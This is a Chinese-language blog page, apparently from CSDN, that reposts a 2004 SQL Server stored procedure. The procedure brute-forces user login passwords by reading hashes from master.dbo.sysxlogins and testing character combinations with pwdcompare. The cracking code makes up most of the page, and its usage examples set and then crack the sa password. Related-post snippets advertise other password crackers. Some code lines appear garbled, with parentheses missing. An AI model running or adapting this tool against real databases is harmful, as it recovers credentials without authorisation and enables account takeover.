穷举法破解 SQL Server 用户密码

最新推荐文章于 2024-05-05 10:15:00 发布
最新推荐文章于 2024-05-05 10:15:00 发布
阅读量1.7k 收藏
点赞数
文章标签: 破解 sql server sqlserver 测试 null
/*--穷举法破解 SQL Server 用户密码 

可以破解中文,特殊字符,字符+尾随空格的密码 
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII 

理论上可以破解任意位数的密码 
条件是你的电脑配置足够,时间足够 

--邹建 2004.08(引用请保留此信息)--*/  

 /*--调用示例 

--测试特殊字符 
declare @pwd sysname 
set @pwd=char(0)+'a ' 
exec sp_password null,@pwd,'sa' 
exec p_GetPassword 

--测试带空格的密码 
exec sp_password null,'a ','sa' 
exec p_GetPassword 

--测试中文 
exec sp_password null,'我 ','sa' 
exec p_GetPassword 

--清除密码 
exec sp_password null,null,'sa' 
--*/  
 create   proc  p_GetPassword 
 @username  sysname = null -- 用户名,如果不指定,则列出所有用户 
@pwdlen   int = 3   -- 密码破解的位数,默认只破解3位及以下的密码 
as  
 -- 生成要破解的密码的用户表 
select  name,password 
,type = case   when  xstatus & 2048 = 2048   then   1   else   0   end  
,jm = case   when  password  is   null   or   datalength (password) < 46  
 then   1   else   0   end  
,pwdstr = case   when   datalength (password) < 46  
 then   cast (password  as  sysname) 
 else   cast ( ''   as  sysname)  end  
,pwd = cast ( ''   as   varchar ( 8000 )) 
 into  #pwd 
 from  master.dbo.sysxlogins a 
 where  srvid  is   null  
 and  name = isnull ( @username ,name) 

 -- 生成临时表 
select   top   255  id = identity ( int , 0 , 1 into  #t  from  sysobjects a,sysobjects b 
 alter   table  #t  add   constraint  PK_#t  primary   key (id) 

 -- 清理不需要的字符 
if   not   exists ( select   1   from  #pwd  where  type = 1
delete   from  #t  where  id  between   65   and   90   or  id  between   129   and   254  

 -- 密码破解处理 
declare   @l   int  
 declare   @s1   varchar ( 8000 ), @s2   varchar ( 8000 ), @s3   varchar ( 8000 ), @s4   varchar ( 8000

-- 破解1位密码 
select   @l = 0  
, @s1 = ' id=a.id '  
, @s2 = ' #t a '  
, @s3 = ' char(b.id) '  
, @s4 = ' cast(b.id as varchar) '  
 exec ( '  
update pwd set jm=1,pwdstr= ' + @s3 + '  
,pwd= ' + @s4 + '  
from #pwd pwd,#t b 
where pwd.jm=0 
and pwdcompare( ' + @s3 + ' ,pwd.password,pwd.type)=1 
 '

-- 破解超过2位的密码 
while   exists ( select   1   from  #pwd  where  jm = 0   and   @l < @pwdlen - 1
begin  
 select   @l = @l + 1  
, @s1 = @s1 + ' ,id ' + cast ( @l   as   varchar
+ ' = ' + char ( @l / 26 + 97 ) + char ( @l % 26 + 97 ) + ' .id '  
, @s2 = @s2 + ' ,#t  ' + char ( @l / 26 + 97 ) + char ( @l % 26 + 97
, @s3 = @s3 + ' +char(b.id ' + cast ( @l   as   varchar ) + ' ) '  
, @s4 = @s4 + ' + '' , '' +cast(b.id ' + cast ( @l   as   varchar ) + '  as varchar) '  
 exec ( '  
select  ' + @s1 + '  into #tt from  ' + @s2 + '  
update pwd set jm=1,pwdstr= ' + @s3 + '  
,pwd= ' + @s4 + '  
from #pwd pwd,#tt b 
where pwd.jm=0 
and pwdcompare( ' + @s3 + ' ,pwd.password,pwd.type)=1 
 '
end  

 -- 显示破解的密码 
select  用户名 = name,密码 = pwdstr,密码ASCII = pwd 
 from  #pwd 
 go  
fuda_1985
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一分钟内破译SQLSERVER密码
03-07
快速破译 SQLSERVER数据库登录 密码, c#完整代码
sql server密码穷举查看器
12-11
可运行在win环境中,预设字母和数字及符号后,通过穷举来测试sql server的连接密码,本人亲测,6位的纯数字密码大约用了3小时被穷举成功
记一次入门难度的SQL注入与密码破解
最新发布
A_991128a的博客
05-05 1025
技术流程没什么可总结,该写的都在上面,我们来谈几点安全行业的问题首先,不要信任用户的输入,用户的输入有时候,可能会对系统造成危害,就像我们的注入语句。很多时候,我们会通过禁止输入诸如空格,分号,引号之类的字符来实施管控,但对应的也有屏蔽这些管控机制的方,这样来回的防御与攻击就是SQL安全领域所研究的课题其次,用户的安全意识。
SQL SERVER密码破解
07-09
只要有master.mdf文件就可以破解
SQL数据库密码破译工具
09-10
SQL数据库密码破译工具,只供学习使用,勿做其他用途。
穷举破解路由器密码的软件
05-03
穷举破解路由器密码的软件 常见的TPlink dlink之类的路由器密码 需挂字典穷举破解
模拟密码破解 6为以内 穷举 破解
05-06
密码破解 穷举破解 6为以内字母、数字等 破解
exhaustive:SQL Server穷举类型
04-10
SQL Server数据库管理系统中,"穷举类型"通常是指对数据进行完全搜索或遍历所有可能的值,以便解决问题或测试所有情况。这种技术在解决特定的查询优化、安全漏洞扫描或者性能调优等问题时非常有用。下面我们将深入...
SQL语句如何获得MSSQLSERVER登录用户密码
07-12
穷举破解 SQL Server 用户密码可以使用存储过程来实现。例如: ``` CREATE PROCEDURE p_GetPassword @username sysname = NULL, --用户名,如果不指定,则列出所有用户 @pwdlen int = 3 --密码破解的位数,默认...
压缩文件密码破解软件(支持穷举等)
04-26
rar,zip等常压缩文件密码破解工具,仅作测试使用,支持数字字母组合,穷举,字典破解
sp_password
10-23
create procedure sp_password @old sysname = NULL, -- the old (current) password @new sysname, -- the new password @loginame sysname = NULL -- user to change password on as
SQL Server中使用sp_password重置SA密码实例
09-10
主要介绍了SQL Server中使用sp_password重置SA密码实例,一般在忘记SA密码时的恢复手段,需要的朋友可以参考下
如何将SQLServer 2000链接服务器的密码破解为明文
热门推荐
08-23 1万+
MSSQL有一个LINKSERVER的功能——链接服务器,每字符加密为4位,不用管加密算,可以撞出来。 查看我的版本号 然后就执行下面的代码首先查看我的连接 代码语句:Exec sp_helpserver  现在看到数据库里面有6个连接现在我要新建立一个linkserver连接名字为dhlinkserver 第一步,先建立一个linkserver
SQL SERVER-查询爆破sa密码的主机
网络资源
04-17 622
SQL SERVER-查询爆破sa密码的主机 drop table if exists #sql create table #sql ( Logdatae varchar(50), processinfo varchar(50), [text] varchar(max) ) go INSERT INTO #sql E...
mysql sp password_MySql 常用命令及密码恢复
weixin_31444881的博客
02-01 337
2008年10月10日 星期五 17:23登陆远程主机命令:Version: mysql5.0mysql -h主机地址 -u用户名 -p密码连接 数据库名字MYSQL如果刚安装好MYSQL,超级用户root是没有密码的。(例:mysql -h192.168.0.2 -uroot -p123456 test) :表示连接到主机192.168.0.1上,用户名是root,密码是123456,目标数据库...
sp_password php,ThinkCMF后台密码忘记了怎么办?
weixin_31807353的博客
04-13 742
ThinkCMF后台密码忘记了怎么办?1.如果你已经在后台配置了,邮件发送功能且邮箱是你的真实邮箱,可以到前台登录页找回密码;2.如果你是后台管理员,你可以使用 sp_password()方生成一下新的密码;你只要在任何一个前台可以访问控制器里,如application/Portal/Controller/IndexController.class.php...
更改密码 sp_password
weixin_30577801的博客
04-09 2754
sp_password添加或更改 Microsoft® SQL Server™ 登录的密码。 语sp_password[ [@old=]'old_password' ,] { [@new=]'new_password'} [,[@loginame=]'login'] 参数[@old=]'old_password'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值